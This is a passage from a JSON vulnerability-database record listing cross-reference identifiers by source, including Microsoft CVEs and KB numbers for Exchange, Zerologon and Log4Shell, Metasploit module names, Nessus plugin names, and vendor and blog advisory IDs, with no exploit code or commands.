"ABBECC2CF1F809CE932B9130A6788B28E3F6228FC5599EA3FB4CD8372D7EA7C8", "AC1B4BF839D3912B4646DFB21DA46EFE78B9249D5C29B4FAB631753998720DBE", "ACEB831DB775B18663FB8C7ED41AB48BFEC59B9270C9444D8DADE42DF02434E0", "AD5C7F7150FBD846C587F5FAD0D7C7B48F81990F52A351F824E5CBBBAC83F163", "AE2FA11123F866B1C71B66A57712F1082B82D3EB4221232EC14E14446822A705", "AE98DBCCCCED8FE9C2F0A9A3294999AEF099215A25C0EDDDFD95DF899965A340", "AFF479D95FDAD4900AA4F096E105276FA32246E4CF2C4642D2BFEACB19522885", "AFFC971A929ABC4A5177F4FBA7D32B82C0ACBC71AEFBBD3E440D08B12B022B51", "B0A8BF7D544954AF5D193262AAD0DEAC7961A5AAEEC3623B441BB795753711B6", "B30C006BF323BCAF8E8EF0489319D47B3A0FB0928442F9EB350A3520109F9F72", "B431011ABF67E8DD4F4E3E4C9F9FD0B1E6E07733191BA7206314070644F2CAF0", "B4779B52313D85FE1157604480F675A0E2BA765BB08DE9BEA2664A6C3AD0F47B", "B47B01CFCEE320F0AE033C32D22579706D0B59585EDEDF3D908CA06FA3E92084", "B5D3987D37FA57ECB44634029606786ADADCB0901EF9858232A7D33908EC5FD2", "B682A1DCF5A33AB9CBD3062B0DF0A131D5180AA2BBD201782B95DC8A2C33D1AA", "B73437073599A5973472D300EA14AD94DB00FCC9790D93795D0BCA840608CBF4", "B735C91C5D46BD88FD491D67AB17706F0B9FDF9D50797EB4994A198C09D7FD04", "B7376C4EB80B7D4936C0682206BD2DC0AD5969B181368D3EB95A8FBA366BDB63", "BAFF6760E68C0F676AFA3DA20E18B06BD703574BC65B9BFDBCD22ACCE05F7FEB", "BB76D9518CCBAE68500AB2DACF1AAAF9F5532441FD3A705A4E4A39114EEBDC0C", "BB785F5F4B456D5F3322E9222022F0E38411602612EBF72BC61AEEABF7FEC2A9", "BB96DF8C4863ECA5111B83DE1E5DBA4C67AC8E6999013404D8DD87C98CC7B60D", "BBA20026A90E4F85555F0C8BD6248AE07F7DE01D687CD62F0159CF4B22E7DA25", "BBB0C0E9DDF621A6AE6C42CB1DFF2B33670CE69032E5482B47DC24C860F78C9A", "BC3A1086428BA3DB72FFD49EA27AAB3A8A9FA0DD5D576D47E0467AE96C365754", "BD8AEC08AE2FA3C7B6CDD03A046DE8D2D846B9AC7A7C2948B791173D0622B3A4", "BE7DD314CD7039219534B2612D0FEFD382DCC5D154AD49257A517A91FA728423", "BFA9A84596ADAC3A47B31C43DD8574B1E532311E1F9B01F003F6AEFDDA4BAACF", "BFA9E5B9CD204137C5C40A62AFA0C09607B8FABF6ADAD16BDE69778F6E3530F1", "C04EDE0E9159DC9AE235755A284662F042D80745649864CE91E7E3E4563221F6", "C0CE38B8081A59A18598B204BF933579D5A04D57C0E8BBBEC053AC1350A2938C", "C1BEC46524F176FAE4CBB603AC283FC9F12029FC3579BBDE20A1B80FA597B0FC", "C3A579D5583598BF4F36F66A731C39A1C3E23351DFAFC16956E2C8DAB030AEBF", "C717E3C358B1EA0AC9E1701DBA722015744796BC3CBA66E7AD79D30CEB45BD60", "C741AA98787A9F837D93EA7D1268C62A551244CB826F0BEFDB076F796F78AB33", "C7FAA00C9C125584B8B9505CE7E7AC97AF7514904E37D2747A78CB0B5B0F3315", "C810746DF12642CDB3444A565C3CE3ABFEFAE31EFE9FE6BC4718CE76334BEB88", "CA111B4E9CA9EC240292C6D00FE0CF8C7559AC1453E3199BC3370D149FB11174", "CBB6711004455A0722EAF33EA7E16444AE4DF08D1F9C341B64251DB448ACCBB4", "CCF869217B83C7570F586028248E128FA170E16792CBF3BAD70423425B1BD638", "CD617F98180D24BACD7FAE3B791B49B329F7F25DC885A6AD81CD6A815194B6BA", "CDB95A8580AD247B239607B2769A506C10A81055AF8F4063AA0D26A850A33B58", "CDC93F5A32848FF0073C48EDC66593F2A0A2AACCAE9802E843826C6E565AE2E9", "CDF01D5D29ED4731048DA0F1A6FDE407B2DA246B226E3DF9945EBC838B4660A1", "CE6A6F0970C169F7DBE65AA5DFCFCEC0BEA99E837906D043FD4B6D3BF7A87D67", "CF56D9AEC134D68DA67A2476D2B87833F63F32777672C1C66A8D8FF69C08623B", "CFDD5A9C7B8C9F6AFEAF6B1C68FF8C11BEADF52EE2E731CBCD194CACB1898BD6", "D28370F3789940A6A2F0B48D0BB882F7E298E5B8C7167BC16F9FB06B92DBCF35", "D4AC8637482E0D53AE579FBD19E568DF643A9D732D1995CBEF53FC6B867F82DA", "D6A22AE665DEADE235C2738407D64638A424C6CC505B816BFEA12DEFCC5CD645", "D728283BFB4D0C3BC5C98FA880696DFC59C2A5FA652666E966D126A6D7FC92FA", "D78F8119FF4EBAA3EA6E8A906FCEFE0DB24B626AB87F3DFEBFA899904F726130", "D792D660667D934B582774E627CB3E2E010E497C8C1D9F4B7C138E4B5DC2ECEC", "D928C805B6C7AD1BA5D5DA1EB77352559E54787E379CD22474A13592C0B83C20", "D9D2F8F1F4727F09E77272D6C8643C3016BCD6A8E4BC6E59B27B37256F4F8F76", "DACB3E9783156FCD47517FD5E71AA5A2242EAA043F56F2EA75EC325BA052BDDD", "DC086AC7F5679D9F84A3DA8B91FAB9C0F09EF5EFB4C8687216156974F51B6283", "DCE05236BD35B28C109059A740CACEE5CE345130605BA9DEA39EFDA6BC532303", "DE8C5DCB7F07498942725CF8F7905DBA001C7B89D3D36370CC303A274CB9A8EB", "DF859649010EE2675B4BBF6D4BFAE7D654D24685054B3403A45C4270AD966550", "E036688C47591ADE56001D0CD1013191D6F43940CA2DB9509F5FCF0F2469F92A", "E0F75591E2E6874A35B6A6C7681543B81128F5226E803A2CCE1D1B664BFC8638", "E141221C1C63036AE1C76B976A04706F4495C39812FC722478A0C755043A0E14", "E1810AD4BA382A8D222D20A49D11C634E6C5240D3F69652E51FC068062DED465", "E2E1AB8B9E10CF0970D428552F10FD3FEA7D405315E7CCA6431E3F0E8079B159", "E36B23DB3CC2EC748DF333353AEDE5A1F8FAA97C1F1DC67E27CD4759E7D0C960", "E3C82809E8425A65E53029135451CC9579AA725E2D85009F892DD0A0FD979ED9", "E41278F69BC61D835FAC88FBCE06075D73C74B99B009DE680A92B2B68FE577DB", "E636319395E5D666C247860149142969762B284D3BE296819A5644E6AE6DDA15", "E679F241D5F455DCABCB653D142792B97352015B6DD79A1EB36DB0B4D54B2902", "E67F6EE1C05A0DFBB7E42F8DDE81795FCC3D933297C925E42690163F0C1D21A6", "E775C68CA18D51E91E688F1880BD5AF1955B5F4DF7397FA28CC721E37DAFB99A", "E7E10B1CFDE7DBAE5E93EB8EF50E03FCA4DAE3C0D9270B040B02BCEE5D0199B9", "E8302DECE1CECF16A05E7F8FBA08D33074F30279F18CDDBABA912B9C9DF9F32D", "E84CA6147175A22CB9253587142088EB24B6AE0BD11EC07E71E299F57DD05739", "E8825B71ACE31BFAA5662E2357C5EEB425BA842AC21E60C761364799BFD2FEE3", "EA69F3ACF81616FFD52E1EC0A74B074CC736B3675D7B61644018A9252D9BD284", "EACE8EC2B7164C19E5BA497C1D57887C847EC033403098801408B0F6BB2B6736", "EBDD1B77CC71D5E7D7E88D21F7F8C7988F44B743E7ABCFC5258E806235EC65A9", "ECC7277FA4D1E6C0C387927905899E353FF202FB061043E0FC8C0DBCF3150F7E", "ED7164C07048A48E59D18BAADA456D0655A81F29CABBDEFA06735647C2B759EA", "ED78D94545EF8A4A811D2C198EC427B8C46CA1FE3BBC9D6A2DC20DD440CB6FDC", "EDA30B3C2FB2766DFAA280B3B5E960EC660172EBFF7B73A524DCE514A3A3F985", "EF05485B7227E17E422CCBDF0EC02D62F554406DEDDDC7A1772D75D577035F79", "EF5F7BA296D0A7B4B6CC058D9B89B1BFEE714F79C2BC4541813DA99A292450B9", "EF71291A92B5250A0A03CC8B24766E487991713BE06BEFF3A0428155C170ECB7", "EFA06779A2DA162F7F70171BAC9D53E998DA486C75081458549AFE875DB6E5B5", "EFC94A6E1DA52C8EA7A5811D6A4381770FA24130DB4CFD911120046DD916261B", "EFD4687D2DC8ADFBEC960932263D6DA222DDFA92899BC72A9B9D62B4331178A6", "F0166F21D9D8651F7C71CAAA5131EEC4CE044F990491482A736F6DD767A3EC0F", "F0259373A53F6B73B3C7BD9A2F3F10DB053D9CC563866E61F5A496D33B416EA9", "F0806D2A2F2817DD3A11695DB658C0C7C64B134E8875822DCE8F5D73AC04E97B", "F16DAE77B5D6C7D782818596F851DFFB29226C0550922519EFC4250E27D09D67", "F18F021F8259C21D1B03D3A3C3F5FD97D6A165E424FE86F9986F545F5A914F8E", "F20E63C2D2D2AA05D977555688CD3131DF08DA240FDFCEB0B017DF8A789BCCEE", "F3EF1FC432D040B91FC6C5AEB324AF8CE32BCFB7A9A0360FC4722981B736F64F", "F435C74BF942E3B3A5FEF2B742E716E29826D42678DE6AB053B1766FC7314452", "F89923018671257EB76989AE7AB9D39396FBAD6F8846CB56D6915361F1CCCC48", "F8F03C35A3C8AEA5027E6C01D991D7E1C3A4A0C9EAE0D875ACF760D1D56B8B9C", "F9CD245944BE763583F94B01BC23C08D6F82CA4989F000C1D0842D4005C4EF11", "FA8CCED2D5B77B978F428FA2F61CD879A13EF9DAC53A5435AC48BEE003AC2363", "FC9172D16F62D7749E6C1369AB9D86ABC42163C780B457F765109BE80ACAD9CF", "FD7B4551E68C6A5B21AD8C3E07FF7CB6ED5402B6F6CD6D419A3FCC60FFB43FC4", "FD90B8CB0F60381B89DB489D4F28883B2B08D5BF67796B29DF21E510CCF7594F", "FEC06635C46DD9EB6B2F50E66A9B098564986FB86BF7FDE8DBF9F7E295CE3162", "FFB1DE47049D302B3C804FCFC90E8D4C1A715F59A9B241F24946D4A7A6598C10", "FFB480E3AA8E74E184658371B22D113F0FB890C232EB9EE9B8A8294BE098DDAE", "FFF0238333AAC9C302B602B36ADA76C6BDDE2A493106B114D0A3A45C8740777D"]}, {"type": "ics", "idList": ["ICSA-21-357-02", "ICSA-22-034-01"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:357497C932E21C66FB08D2C9B8EE9CA2", "IMPERVABLOG:5E03360E0443A626205E9BCF969114F6", "IMPERVABLOG:7B28F00C5CD12AC5314EB23EAE40413B", "IMPERVABLOG:7CB37AC69862942C5D316E69A7815579", "IMPERVABLOG:85E1B351EDAA80DF81632A8B8BD07634", "IMPERVABLOG:A30E92D9B177CCFF9F5476DD34E25F51", "IMPERVABLOG:B4C9A56D0F82346F616E74B1CFB10A5D", "IMPERVABLOG:B69DFFED5C2E2C9D2F9917E3F4915200", "IMPERVABLOG:BB63986B2DE2CCB2C65DD3747791097F", "IMPERVABLOG:BE9CCB7ADF74E2AEFC999FEE704CDE71", "IMPERVABLOG:BEE8EB9D446D0AF62464EE59DFA0CE0E", "IMPERVABLOG:DB0BBA5A6E2E523FAA7F7A73C45FEA96"]}, {"type": "intel", "idList": ["INTEL:INTEL-SA-00646"]}, {"type": "kaspersky", "idList": ["KLA11664", "KLA11929", "KLA11931", "KLA12103", "KLA12169", "KLA12224", "KLA12390", "KLA12392", "KLA12393", "KLA12395", "KLA12396", "KLA12442"]}, {"type": "kitploit", "idList": ["KITPLOIT:119877528847056004", "KITPLOIT:1207079539580982634", "KITPLOIT:1244156083583318186", "KITPLOIT:134021490040098714", "KITPLOIT:144331229809700743", "KITPLOIT:1680589374755422772", "KITPLOIT:2686676167278919598", "KITPLOIT:2722328714476257207", "KITPLOIT:3188944951765917430", "KITPLOIT:3532211766929466258", "KITPLOIT:3773942873037113539", "KITPLOIT:4125185526326677098", "KITPLOIT:4333067961180534072", "KITPLOIT:4421457840699592233", "KITPLOIT:4425790137948714912", "KITPLOIT:4462385753504235463", "KITPLOIT:4654779182065061303", "KITPLOIT:4707889613618662864", "KITPLOIT:5104415481503400470", "KITPLOIT:522409803487164759", "KITPLOIT:5376485594298165648", "KITPLOIT:5397133847150975825", "KITPLOIT:5563730483162396602", "KITPLOIT:5734436811250397170", "KITPLOIT:5789499291738758939", "KITPLOIT:5829195600312197311", "KITPLOIT:6422486000446318290", "KITPLOIT:6516544912632048506", "KITPLOIT:6759391622067035795", "KITPLOIT:7070039119688478663", "KITPLOIT:763105754466120590", "KITPLOIT:7847586937102427883", "KITPLOIT:7976092996345827446", "KITPLOIT:8031680161397698025", "KITPLOIT:8148701901300660800", "KITPLOIT:816704453339226193", "KITPLOIT:8266451932034361580", "KITPLOIT:8945091038325456871", "KITPLOIT:965198862441671998"]}, {"type": "krebs", "idList": ["KREBS:1BEFD58F5124A2E4CA40BD9C1B49B9B7", "KREBS:65D25A653F7348C7F18FFD951447B275", "KREBS:69ADDAD13D83673CDE629B3AD655DD29", "KREBS:831FD0B726B800B2995A68BA50BD8BE3", "KREBS:952ACEBFD55EBD076910C6B233491883", "KREBS:95DEE0244F6DE332977BB606555E5A3C", "KREBS:9D9C58DB5C5495B10D2EBDB92549B0F2", "KREBS:A8F0DD3F6E965A3A66B2CCBB003ACF62", "KREBS:DF8493DA16F49CE6247436830678BA8D"]}, {"type": "mageia", "idList": ["MGASA-2020-0380", "MGASA-2021-0556", "MGASA-2021-0566"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:1476491C6EB2E7829EC63A183A35CE8B", "MALWAREBYTES:1B8D17909172F80C0F82CB21FDFC33B2", "MALWAREBYTES:39A05D4A4EC81966F7A1721DFACB3470", "MALWAREBYTES:42218FB85F05643E0B2C2C7D259EFEB5", "MALWAREBYTES:4CB01833826116B2823401DFB69A5431", "MALWAREBYTES:5899EF0CF34937AFA2DB4AB02D282DF6", "MALWAREBYTES:5B32671B820EEB03840B798BCEA9FDC8", "MALWAREBYTES:60B52235DCBD12E98C7DB46F859F885C", "MALWAREBYTES:6A4862332586F98DA4761BE2B684752F", "MALWAREBYTES:6ECB9DE9A2D8D714DB50F19BAF7BF3D4", "MALWAREBYTES:78E91E28F51B0A15B6CA53FF8A9B480B", "MALWAREBYTES:7C9E5CAE3DDA4E673D38360AB2A5706B", "MALWAREBYTES:80B21E934B1C43C7071F039FE9512208", "MALWAREBYTES:A325F8FB1D527BD3C6C1C3A187840632", "MALWAREBYTES:B0F2474F776241731FE08EA7972E6239", "MALWAREBYTES:B4D157FAC0EB655355514D120382CC56", "MALWAREBYTES:B6DA5FE033D50131FABF027A2BB04385", "MALWAREBYTES:B830332817B5D5BEE99EF296E8EC7E2A", "MALWAREBYTES:B8C767042833344389F6158273089954", "MALWAREBYTES:BAB94968DD1EC37DA6F977226977DAF5"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY-ADMIN-DCERPC-CVE_2020_1472_ZEROLOGON-", "MSF:AUXILIARY-GATHER-EXCHANGE_PROXYLOGON_COLLECTOR-", "MSF:AUXILIARY-SCANNER-HTTP-EXCHANGE_PROXYLOGON-", "MSF:AUXILIARY-SCANNER-HTTP-LOG4SHELL_SCANNER-", "MSF:EXPLOIT-MULTI-HTTP-ATLASSIAN_CONFLUENCE_WEBWORK_OGNL_INJECTION-", "MSF:EXPLOIT-MULTI-HTTP-LOG4SHELL_HEADER_INJECTION-", "MSF:EXPLOIT-MULTI-HTTP-VMWARE_VCENTER_LOG4SHELL-", "MSF:EXPLOIT-WINDOWS-HTTP-EXCHANGE_ECP_VIEWSTATE-", "MSF:EXPLOIT-WINDOWS-HTTP-EXCHANGE_PROXYLOGON_RCE-", "MSF:EXPLOIT-WINDOWS-HTTP-EXCHANGE_PROXYSHELL_RCE-", "MSF:EXPLOIT-WINDOWS-HTTP-MANAGEENGINE_ADSELFSERVICE_PLUS_CVE_2021_40539-", "MSF:EXPLOIT-WINDOWS-LOCAL-CVE_2020_0787_BITS_ARBITRARY_FILE_MOVE-"]}, {"type": "mmpc", "idList": ["MMPC:27EEFD67E5E7E712750B1472E15C5A0B", "MMPC:28641FE2F73292EB4B26994613CC882B", "MMPC:2FB5327A309898BD59A467446C9C36DC", "MMPC:42ECD98DCF925DC4063DE66F75FB5433", "MMPC:4A6B394DCAF12E05136AE087248E228C", "MMPC:A2F131E46442125176E4853C860A816C", "MMPC:B1806E4D7F97F83DB41A41A9BBF86D13", "MMPC:BB2F5840056D55375C4A19D2FF07C695", "MMPC:C0F4687B18D53FB9596AD4FDF77092D8", "MMPC:D6D537E875C3CBD84822A868D24B31BA", "MMPC:E537BA51663A720821A67D2A4F7F7F0E", "MMPC:FC03200E57A46D16A8CD1A5A0E647BB3"]}, {"type": "mscve", "idList": ["MS:CVE-2020-0688", "MS:CVE-2020-1472", "MS:CVE-2021-26412", "MS:CVE-2021-26854", "MS:CVE-2021-26855", "MS:CVE-2021-26857", "MS:CVE-2021-26858", "MS:CVE-2021-27065", "MS:CVE-2021-27078", "MS:CVE-2021-31196", "MS:CVE-2021-31206", "MS:CVE-2021-31207", "MS:CVE-2021-33768", "MS:CVE-2021-34470", "MS:CVE-2021-34473", "MS:CVE-2021-34523", "MS:CVE-2021-44228"]}, {"type": "mskb", "idList": ["KB4536987", "KB4536988", "KB4536989", "KB4601315", "KB4601318", "KB4601319", "KB4601345", "KB4601347", "KB4601348", "KB4601349", "KB4601357", "KB4601363", "KB4601384", "KB5000871", "KB5000978", "KB5001779", "KB5003435"]}, {"type": "msrc", "idList": ["MSRC:543F3A129A47F4B14FB170389908717B", "MSRC:5B84BD451283462DC81D4090EFE66280", "MSRC:96F2FB0D77EED0ABDED8EBD64AEBEA09", "MSRC:ED939F90BDE8D7A32031A750388B03C9"]}, {"type": "mssecure", "idList": ["MSSECURE:27EEFD67E5E7E712750B1472E15C5A0B", "MSSECURE:28641FE2F73292EB4B26994613CC882B", "MSSECURE:2FB5327A309898BD59A467446C9C36DC", "MSSECURE:42ECD98DCF925DC4063DE66F75FB5433", "MSSECURE:4A6B394DCAF12E05136AE087248E228C", "MSSECURE:748E6D0B920B699D6D088D0AD4422C46", "MSSECURE:A2F131E46442125176E4853C860A816C", "MSSECURE:B1806E4D7F97F83DB41A41A9BBF86D13", "MSSECURE:BB2F5840056D55375C4A19D2FF07C695", "MSSECURE:C0F4687B18D53FB9596AD4FDF77092D8", "MSSECURE:D6D537E875C3CBD84822A868D24B31BA", "MSSECURE:E3C8B97294453D962741782EC959E79C", "MSSECURE:E537BA51663A720821A67D2A4F7F7F0E", "MSSECURE:FC03200E57A46D16A8CD1A5A0E647BB3"]}, {"type": "myhack58", "idList": ["MYHACK58:62201995674"]}, {"type": "nessus", "idList": ["701277.PRM", "AL2_ALAS-2021-001.NASL", "AL2_ALAS-2021-1585.NASL", "AL2_ALAS-2021-1730.NASL", "AL2_ALAS-2021-1731.NASL", "AL2_ALAS-2021-1732.NASL", "AL2_ALAS-2022-1773.NASL", "AL2_ALAS-2022-1806.NASL", "AL2_ALASCORRETTO8-2021-001.NASL", "AL2_ALASJAVA-OPENJDK11-2021-001.NASL", "ALA_ALAS-2021-1469.NASL", "ALA_ALAS-2021-1553.NASL", "ALA_ALAS-2021-1554.NASL", "ALA_ALAS-2022-1562.NASL", "ALA_ALAS-2022-1580.NASL", "ALA_ALAS-2022-1601.NASL", "ALMA_LINUX_ALSA-2021-1647.NASL", "ALMA_LINUX_ALSA-2022-0290.NASL", "APACHE_APEREO_CAS_LOG4SHELL.NBIN", "APACHE_DRUID_LOG4SHELL.NBIN", "APACHE_JSPWIKI_LOG4SHELL.NBIN", "APACHE_LOG4J_2_15_0.NASL", "APACHE_LOG4J_2_16_0.NASL", "APACHE_LOG4J_JDNI_LDAP_GENERIC.NBIN", "APACHE_LOG4J_JDNI_LDAP_GENERIC_HTTP_HEADERS.NBIN", "APACHE_LOG4J_JDNI_LDAP_GENERIC_TELNET.NBIN", "APACHE_LOG4J_JNDI_LDAP_GENERIC_RAW.NBIN", "APACHE_LOG4J_WIN_2_15_0.NASL", "APACHE_LOG4SHELL_DNS.NBIN", "APACHE_LOG4SHELL_IMAP.NBIN", "APACHE_LOG4SHELL_MSRPC.NBIN", "APACHE_LOG4SHELL_NETBIOS.NBIN", "APACHE_LOG4SHELL_POP3.NBIN", "APACHE_LOG4SHELL_SMTP.NBIN", "APACHE_LOG4SHELL_SNMP.NBIN", "APACHE_LOG4SHELL_SSH.NBIN", "APACHE_LOG4SHELL_UPNP.NBIN", "APACHE_OFBIZ_LOG4SHELL.NBIN", "APACHE_SOLR_LOG4SHELL.NBIN", "CENTOS8_RHSA-2021-1647.NASL", "CENTOS_RHSA-2020-5439.NASL", "CISCO-SA-APACHE-LOG4J-QRUKNEBD-CUIC.NASL", "CISCO-SA-APACHE-LOG4J-QRUKNEBD-ISE.NASL", "CISCO-SA-APACHE-LOG4J-QRUKNEBD-SDWAN-VMANAGE.NASL", "CISCO-SA-APACHE-LOG4J-QRUKNEBD-UCS-DIRECTOR.NASL", "CONFLUENCE_CONFSERVER-67940.NASL", "CONFLUENCE_CVE_2021_26084.NBIN", "DEBIAN_DLA-2463.NASL", "DEBIAN_DLA-2842.NASL", "DEBIAN_DLA-2905.NASL", "DEBIAN_DSA-5020.NASL", "DEBIAN_DSA-5022.NASL", "EULEROS_SA-2020-2171.NASL", "EULEROS_SA-2020-2181.NASL", "EULEROS_SA-2020-2299.NASL", "EULEROS_SA-2020-2396.NASL", "EULEROS_SA-2021-1050.NASL", "EULEROS_SA-2021-1118.NASL", "EULEROS_SA-2021-1517.NASL", "EULEROS_SA-2021-1533.NASL", "EULEROS_SA-2021-1625.NASL", "EULEROS_SA-2021-1635.NASL", "EULEROS_SA-2021-2168.NASL", "EULEROS_SA-2022-1276.NASL", "EXCHANGE_CVE-2021-26855.NBIN", "EXCHANGE_PROXYSHELL.NBIN", "FEDORA_2020-0BE2776ED3.NASL", "FEDORA_2020-77C15664B0.NASL", "FEDORA_2020-A1D139381A.NASL", "FORTIOS_FG-IR-18-384.NASL", "FORTIOS_FG-IR-18-384_DIRECT.NASL", "FREEBSD_PKG_1EA05BB85D7411ECBB1E001517A2E1A4.NASL", "FREEBSD_PKG_24ACE516FAD711EA8D8C005056A311D1.NASL", "FREEBSD_PKG_3FADD7E4F8FB45A0A2188FD6423C338F.NASL", "FREEBSD_PKG_4B1AC5A35BD411EC8602589CFC007716.NASL", "FREEBSD_PKG_515DF85A5CD711ECA16D001517A2E1A4.NASL", "FREEBSD_PKG_650734B2766541709A0AEECED5E10A5E.NASL", "FREEBSD_PKG_93A1C9A75BEF11ECA47A001517A2E1A4.NASL", "FREEBSD_PKG_B0F49CB9673611EC9EEA589CFC007716.NASL", "GENTOO_GLSA-202012-24.NASL", "HAFNIUM_IOC_DETECT.NBIN", "LOG4J_LOG4SHELL_FTP.NBIN", "LOG4J_LOG4SHELL_NTP.NBIN", "LOG4J_LOG4SHELL_PPTP.NBIN", "LOG4J_LOG4SHELL_RPCBIND.NBIN", "LOG4J_LOG4SHELL_SIP_INVITE.NBIN", "LOG4J_LOG4SHELL_SMB.NBIN", "LOG4J_LOG4SHELL_WWW.NBIN", "LOG4J_VULNERABLE_ECOSYSTEM_LAUNCHER.NASL", "MACOSX_FORTIOS_FG-IR-18-384.NASL", "MACOS_SPLUNK_824.NASL", "MANAGEENGINE_ADSELFSERVICE_6114.NASL", "MANAGEENGINE_ADSELFSERVICE_PLUS_CVE-2021-40539.NBIN", "MANAGEENGINE_EVENTLOG_ANALYZER_CVE-2021-40539.NBIN", "MANAGEENGINE_LOG360_CVE-2021-40539.NBIN", "MOBILEIRON_LOG4SHELL.NBIN", "NETLOGON_ZEROLOGON_CVE-2020-1472.NBIN", "NEWSTART_CGSL_NS-SA-2021-0024_SAMBA.NASL", "NEWSTART_CGSL_NS-SA-2021-0167_SAMBA.NASL", "NEWSTART_CGSL_NS-SA-2022-0058_SAMBA.NASL", "OPENSUSE-2020-1513.NASL", "OPENSUSE-2020-1526.NASL", "OPENSUSE-2021-1577.NASL", "OPENSUSE-2021-1586.NASL", "OPENSUSE-2021-1601.NASL", "OPENSUSE-2021-1612.NASL", "OPENSUSE-2021-1613.NASL", "OPENSUSE-2021-1631.NASL", "OPENSUSE-2021-3999.NASL", "OPENSUSE-2021-4094.NASL", "OPENSUSE-2021-4107.NASL", "OPENSUSE-2021-4109.NASL", "OPENSUSE-2021-4111.NASL", "OPENSUSE-2021-4112.NASL", "OPENSUSE-2022-0038-1.NASL", "ORACLELINUX_ELSA-2020-5439.NASL", "ORACLELINUX_ELSA-2021-1647.NASL", "ORACLELINUX_ELSA-2021-5206.NASL", "ORACLELINUX_ELSA-2022-0290.NASL", "ORACLELINUX_ELSA-2022-9056.NASL", "ORACLE_PRIMAVERA_GATEWAY_CPU_JAN_2022.NASL", "ORACLE_PRIMAVERA_P6_EPPM_CPU_JAN_2022.NASL", "PALO_ALTO_LOG4SHELL.NASL", "PULSE_CONNECT_SECURE-CVE-2019-11510.NASL", "PULSE_CONNECT_SECURE-SA-44101.NASL", "PULSE_CONNECT_SECURE_PATH_TRAVERSAL.NBIN", "REDHAT-RHSA-2020-5439.NASL", "REDHAT-RHSA-2021-1647.NASL", "REDHAT-RHSA-2021-3723.NASL", "REDHAT-RHSA-2022-1296.NASL", "REDHAT-RHSA-2022-1297.NASL", "SL_20201215_SAMBA_ON_SL7_X.NASL", "SMB_NT_MS20_AUG_4565349.NASL", "SMB_NT_MS20_AUG_4571694.NASL", "SMB_NT_MS20_AUG_4571703.NASL", "SMB_NT_MS20_AUG_4571729.NASL", "SMB_NT_MS20_AUG_4571736.NASL", "SMB_NT_MS20_FEB_EXCHANGE.NASL", "SMB_NT_MS21_APR_EXCHANGE.NASL", "SMB_NT_MS21_FEB_4601347.NASL", "SMB_NT_MS21_MAR_EXCHANGE_2010_OOB.NASL", "SMB_NT_MS21_MAR_EXCHANGE_OOB.NASL", "SMB_NT_MS21_MAY_EXCHANGE.NASL", "SPLUNK_824.NASL", "SUSE_SU-2020-2719-1.NASL", "SUSE_SU-2020-2720-1.NASL", "SUSE_SU-2020-2721-1.NASL", "SUSE_SU-2020-2722-1.NASL", "SUSE_SU-2020-2724-1.NASL", "SUSE_SU-2020-2730-1.NASL", "SUSE_SU-2021-14866-1.NASL", "SUSE_SU-2021-4111-1.NASL", "SUSE_SU-2021-4112-1.NASL", "SUSE_SU-2021-4115-1.NASL", "UBIQUITI_UNIFI_NETWORK_LOG4SHELL.NBIN", "UBUNTU_USN-4510-1.NASL", "UBUNTU_USN-4559-1.NASL", "UBUNTU_USN-5192-1.NASL", "UBUNTU_USN-5192-2.NASL", "UBUNTU_USN-5197-1.NASL", "UBUNTU_USN-5223-1.NASL", "VMWARE_HORIZON_LOG4SHELL.NBIN", "VMWARE_VCENTER_CVE-2021-21972.NBIN", "VMWARE_VCENTER_LOG4SHELL.NBIN", "VMWARE_VCENTER_VMSA-2021-0002.NASL", "VMWARE_VREALIZE_OPERATIONS_MANAGER_LOG4SHELL.NBIN", "WEB_APPLICATION_SCANNING_112944", "WEB_APPLICATION_SCANNING_112961", "WEB_APPLICATION_SCANNING_112962", "WEB_APPLICATION_SCANNING_112963", "WEB_APPLICATION_SCANNING_112964", "WEB_APPLICATION_SCANNING_113075", "WEB_APPLICATION_SCANNING_113243"]}, {"type": "nvidia", "idList": ["NVIDIA:5294", "NVIDIA:5295"]}, {"type": "oracle", "idList": ["ORACLE:CPUAPR2021", "ORACLE:CPUJAN2022"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-5439", "ELSA-2021-1647"]}, {"type": "osv", "idList": ["OSV:DLA-2463-1", "OSV:DLA-2842-1", "OSV:DSA-5020-1", "OSV:DSA-5022-1", "OSV:GHSA-3QPM-H9CH-PX3C", "OSV:GHSA-7RJR-3Q55-VV33", "OSV:GHSA-FP5R-V3W9-4333", "OSV:GHSA-J3CH-VJPH-8Q6V", "OSV:GHSA-J7C3-96RF-JRRP", "OSV:GHSA-JFH8-C2JP-5V3Q", "OSV:GHSA-MF4F-J588-5XM8", "OSV:GHSA-V57X-GXFJ-484Q"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154146", "PACKETSTORM:154147", "PACKETSTORM:154176", "PACKETSTORM:156592", "PACKETSTORM:156620", "PACKETSTORM:158056", "PACKETSTORM:160127", "PACKETSTORM:161527", "PACKETSTORM:161590", "PACKETSTORM:161695", "PACKETSTORM:161806", "PACKETSTORM:161846", "PACKETSTORM:161938", "PACKETSTORM:162610", "PACKETSTORM:162736", "PACKETSTORM:163268", "PACKETSTORM:163895", "PACKETSTORM:164013", "PACKETSTORM:164122", "PACKETSTORM:165085", "PACKETSTORM:165261", "PACKETSTORM:165270", "PACKETSTORM:165532", "PACKETSTORM:165642", "PACKETSTORM:165673", "PACKETSTORM:167449", "PACKETSTORM:167917"]}, {"type": "paloalto", "idList": ["PA-CVE-2021-44228"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:8FD1C9A0D76A3084445136A0275847C0"]}, {"type": "qt", "idList": ["QT:7EFAEDCED59EA2EE3AB98A0A484C5825"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:01C65083E501A6BAFB08FCDA1D561012", "QUALYSBLOG:13C1A00A7D0A7B1BB16D0AB5B1E9B51A", "QUALYSBLOG:14FD05969C722B5BF3DBBF48ED6DA9C0", "QUALYSBLOG:15D6ABF4D9A50D86E63BA4553A0CD3C6", "QUALYSBLOG:192411B44569225E2F2632594DC4308C", "QUALYSBLOG:282A52EA9B1F4C4F3F084197709217B0", "QUALYSBLOG:33FD0B08A1B2E414EAA2ADDFCDFE0EB1", "QUALYSBLOG:3B1C0CD4DA2F528B07C93411EA447658", "QUALYSBLOG:3F1898282AF38991E0B849D7A68D2A2B", "QUALYSBLOG:3FADA4B80DBBF178154C0729CFC1358F", "QUALYSBLOG:42335884011D582222F08AEF81D70B94", 